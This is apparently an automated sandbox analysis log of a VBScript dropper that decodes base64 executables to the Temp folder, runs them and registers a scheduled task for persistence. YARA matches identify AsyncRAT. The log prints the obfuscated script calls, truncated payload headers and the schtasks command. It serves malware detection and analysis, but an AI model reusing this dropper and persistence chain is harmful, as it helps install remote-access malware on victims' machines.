            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\ame.exe");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALKNKPEAAAAAAAAAAOAAIgALATAAANIBAAAIAAAAAAAA7vE");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\ame.exe", "2");IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKEn6VQAAAAAAAAAAOAADgELAQYAAMgBAABgAQAAAAAAkuc");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\fi.exe", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\ame.exe");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\fi.exe")
            .NET source code contains potential unpackerShow sources
            Source: ame.exe.1.dr, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: dhcpmon.exe.4.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.drStatic PE information: 0xF1288DB2 [Tue Mar 18 07:39:30 2098 UTC]
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E5BA1 push E87220CAh; ret
            Source: dhcpmon.exe.4.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: dhcpmon.exe.4.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ame.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\ame.exeFile created: C:\Users\user\AppData\Roaming\Notepads.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fi.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

            Boot Survival:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Users\user\AppData\Local\Temp\ame.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\LinkageJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\LinkageJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile opened: C:\Users\user\AppData\Local\Temp\fi.exe:Zone.Identifier read attributes | delete
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
